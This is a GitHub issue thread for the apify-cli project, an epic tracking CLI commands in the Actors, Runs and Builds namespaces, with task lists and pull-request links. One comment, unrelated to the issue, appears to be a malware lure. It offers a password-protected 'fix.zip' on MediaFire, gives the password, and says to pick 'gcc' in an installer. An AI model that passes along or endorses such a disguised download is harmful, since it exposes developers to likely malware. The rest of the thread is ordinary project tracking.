### ISSUE TITLE
EPIC: Builds/Runs/Actors Namespace

### ISSUE THREAD

**Issue by vladfrangu** [apify/apify-cli#619]
[Notion document](https://www.notion.so/apify/API-CLI-design-Final-Draft-517b46afd5b8431dae7e38b06c9080fc#68bf93c034f84e9d80dcb325805fb875)

- [ ] Actors @vladfrangu 
```[tasklist]
### Actors
- [x] call https://github.com/apify/apify-cli/pull/663
- [x] start https://github.com/apify/apify-cli/pull/669
- [x] push https://github.com/apify/apify-cli/pull/671
- [x] pull https://github.com/apify/apify-cli/pull/662
- [x] ls https://github.com/apify/apify-cli/pull/675
- [x] info
- [x] rm https://github.com/apify/apify-cli/pull/648
- [x] build https://github.com/apify/apify-cli/pull/661
```

- [x] Runs (@vladfrangu)
```[tasklist]
### Runs
- [x] ls https://github.com/apify/apify-cli/pull/640
- [x] info https://github.com/apify/apify-cli/pull/657
- [x] rm https://github.com/apify/apify-cli/pull/648
- [x] log https://github.com/apify/apify-cli/pull/645
- [x] resurrect https://github.com/apify/apify-cli/pull/644
- [x] abort https://github.com/apify/apify-cli/pull/643
```

- [x] Builds (@vladfrangu working on) #620 
```[tasklist]
### Builds
- [x] create
- [x] ls
- [x] info
- [x] log
- [x] rm https://github.com/apify/apify-cli/pull/648
- [ ] add-tag // paused for now
- [ ] remove-tag // paused for now
```

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by B4nan** [comment]
thank you!

cc @netmilk

**Comment by netmilk** [comment]
🙌

**Comment by vladfrangu** [comment]
@netmilk fyi, added in another cmd into builds namespace, rm, for api consistency and bc runs has it too
